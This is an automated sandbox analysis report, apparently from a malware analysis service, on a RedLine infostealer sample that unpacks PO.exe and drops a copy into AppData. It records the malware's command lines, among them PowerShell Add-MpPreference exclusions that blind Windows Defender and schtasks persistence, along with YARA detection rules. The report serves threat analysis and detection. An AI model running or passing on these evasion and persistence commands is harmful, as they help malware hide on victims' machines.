Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_06979630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_06974468
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_06973311
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_06971300
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_0697DD18
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_0697DA24
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_0697D528
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_069712FB
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_05460040
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_054609F0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_05460A00
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA8278
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA1628
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA1638
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA2E38
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA0DB8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA0DC8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA02B8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA1200
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA3270
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA11F0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D42C18
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D44FE8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D4540F
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D42C09
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D49DF0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D49DE0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D44FD8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D4539C
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D45387
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D496D0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_010DE7B0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_010DDC90
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_06789630
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_06784468
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_0678D528
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_06781210
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_06783320
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_0678DA30
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_0678C418

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: String function: 0018C468 appears 55 times

Source: w4XFffGDz1.exe, 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameRzhrA.exe8 vs w4XFffGDz1.exe

Source: w4XFffGDz1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: PO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AJzHYZtQIb.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 7.2.PO.exe.79d0000.8.raw.unpack, hWGYb7gUweomxbkY6U.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, hWGYb7gUweomxbkY6U.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: _0020.SetAccessControl
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: _0020.AddAccessRule
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: _0020.SetAccessControl
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: _0020.AddAccessRule

Source: 7.2.PO.exe.2a3bdf8.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 7.2.PO.exe.7180000.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 7.2.PO.exe.2a2bde0.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/104@2/1

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_00172E6F GetLastError,FormatMessageW,_wcslen,LocalFree,

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_00185C5C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

File created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Mutant created: \Sessions\1\BaseNamedObjects\KEzgwTXVdrBxFOg
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Command line argument: sfxname
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Command line argument: sfxstime
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Command line argument: STARTDLG

Source: w4XFffGDz1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: PO.exe, 0000000E.00000002.2291165421.0000000006913000.00000004.00000020.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2293576595.0000000007161000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2376563773.0000000006F77000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003362000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, tmp7F89.tmp.21.dr, tmpA0BE.tmp.21.dr, tmpCE16.tmp.14.dr, tmp2BB9.tmp.14.dr, tmpCDF5.tmp.14.dr, tmp2BA8.tmp.14.dr, tmp2BDA.tmp.14.dr, tmp2BD9.tmp.14.dr, tmpD8D8.tmp.21.dr, tmpA0AE.tmp.21.dr, tmpCE06.tmp.14.dr, tmpCE38.tmp.14.dr, tmp7F58.tmp.21.dr, tmp7F78.tmp.21.dr, tmpD909.tmp.21.dr, tmpCE27.tmp.14.dr, tmpD8D7.tmp.21.dr, tmp2BFA.tmp.14.dr, tmp621E.tmp.14.dr, tmp7F8A.tmp.21.dr, tmpB5DE.tmp.21.dr, tmpCE48.tmp.14.dr, tmp7F9B.tmp.21.dr, tmpD8F8.tmp.21.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: w4XFffGDz1.exe	ReversingLabs: Detection: 68%
Source: w4XFffGDz1.exe	Virustotal: Detection: 67%

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File read: C:\Users\user\Desktop\w4XFffGDz1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\w4XFffGDz1.exe "C:\Users\user\Desktop\w4XFffGDz1.exe"
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: twinui.appcore.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: execmodelproxy.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: mrmcorer.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: bcp47mrm.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.ui.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windowmanagementapi.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: inputhost.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: apphelp.dll
